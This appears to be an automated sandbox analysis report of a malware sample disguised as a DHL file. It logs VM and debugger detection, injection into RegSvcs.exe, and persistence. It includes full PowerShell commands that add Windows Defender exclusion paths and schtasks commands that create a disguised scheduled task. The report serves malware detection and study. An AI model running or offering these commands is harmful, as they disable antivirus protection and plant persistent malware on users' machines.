                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599889Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599763Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599655Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599539Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599421Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599312Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599189Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599062Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598953Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598843Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598624Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598507Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598389Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598277Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598157Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99874Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99765Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99546Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99410Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99125Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98906Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98796Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98687Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98577Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98468Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98359Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98140Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97921Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97812Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97703Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97593Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97484Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97374Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97264Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97153Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97045Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96934Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96826Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96717Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96607Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599449
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599124
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598905
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598685
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598436
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598328
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598218
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99874
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99766
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99641
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99516
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99405
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99297
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99063
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98938
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98828
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98719
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98594
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98485
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97985
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97740
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97485
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96985
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96735
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96485
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95985
                      Source: RegSvcs.exe, 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: RegSvcs.exe, 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: uvbIwIYe.exe, 0000000B.00000002.1560537386.000000000737C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: uvbIwIYe.exe, 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                      Source: uvbIwIYe.exe, 0000000B.00000002.1560537386.000000000737C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: RegSvcs.exe, 0000000A.00000002.1539589797.0000000005FF8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3859197614.000000000626E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01177ED0 CheckRemoteDebuggerPresent,10_2_01177ED0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe"
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AAA008Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeQueries volume information: C:\Users\user\Desktop\DHL_231437894819.bat.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
